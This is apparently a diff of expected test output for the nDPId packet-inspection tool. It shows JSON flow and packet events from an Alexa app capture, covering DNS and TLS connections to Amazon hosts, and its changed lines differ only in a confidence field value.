{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1490976064333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064333,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WldAAEARM2CsECrYrBAqAa27ADUAKN4THgkBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1490976064448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976064448,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC91iFAAEARtxSsECoBrBAq2AA1rbsAqQ1IHgmBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABFAAoDd3d3A2NkbsAQwCwABQABAAAAAwAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAEABDRV0djAQgABAAEAAAABAAQ0VdHFwEIAAQABAAAAAQAENFXRj8BCAAEAAQAAAAEABDRV0Xo="} 
-00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"} 
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1490976067916,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067916,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlhAAEARM1+sECrYrBAqAe2EADUAKHojSVQBAAABAAAAAAAAA2FwaQZhbWF6b24DY29tAAABAAE="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1490976067965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976067965,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM1zdAAEARtm+sECoBrBAq2AA17YQAOOTBSVSBgAABAAEAAAAAA2FwaQZhbWF6b24DY29tAAABAAHADAABAAEAAAAsAAQ27x2S"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} 